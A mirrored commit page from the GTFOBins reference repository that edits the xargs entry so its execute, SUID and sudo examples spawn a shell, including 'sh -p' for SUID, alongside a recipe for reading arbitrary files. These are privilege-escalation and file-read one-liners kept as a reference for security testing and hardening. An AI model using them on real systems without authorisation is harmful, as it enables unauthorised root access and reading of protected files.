mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 10:48:50 +01:00 
			
		
		
		
	Make xargs execute-interactive
This commit is contained in:
		@@ -1,14 +1,17 @@
 | 
			
		||||
---
 | 
			
		||||
functions:
 | 
			
		||||
  execute-non-interactive:
 | 
			
		||||
    - code: xargs -a /dev/null /usr/bin/id
 | 
			
		||||
  execute-interactive:
 | 
			
		||||
    - description: GNU version only.
 | 
			
		||||
      code: xargs -a /dev/null sh
 | 
			
		||||
  file-read:
 | 
			
		||||
    - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
 | 
			
		||||
      code: |
 | 
			
		||||
        LFILE=file_to_read
 | 
			
		||||
        xargs -a "$LFILE" -0
 | 
			
		||||
  suid-enabled:
 | 
			
		||||
    - code: ./xargs -a /dev/null /usr/bin/id
 | 
			
		||||
    - description: GNU version only.
 | 
			
		||||
      code: ./xargs -a /dev/null sh -p
 | 
			
		||||
  sudo-enabled:
 | 
			
		||||
    - code: sudo xargs -a /dev/null /usr/bin/id
 | 
			
		||||
    - description: GNU version only.
 | 
			
		||||
      code: sudo xargs -a /dev/null sh
 | 
			
		||||
---
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user